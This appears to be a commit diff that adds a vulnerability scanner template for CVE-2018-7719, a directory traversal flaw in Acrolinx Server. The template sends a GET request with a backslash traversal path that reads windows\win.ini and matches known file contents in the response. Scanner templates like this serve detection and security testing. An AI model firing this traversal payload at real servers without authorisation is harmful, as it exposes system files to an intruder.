Create CVE-2018-7719.yaml
parent
0d2a2f4e15
commit
aee6876bc4
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2018-7719
|
||||
|
||||
info:
|
||||
name: Acrolinx Server Directory Traversal
|
||||
author: 0x_akoko
|
||||
severity: high
|
||||
description: Acrolinux Server versions prior to 5.2.5 suffer from a directory traversal vulnerability.
|
||||
reference:
|
||||
- https://www.cvedetails.com/cve/CVE-2018-7719
|
||||
- https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2018-7719
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2018,acrolinx,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue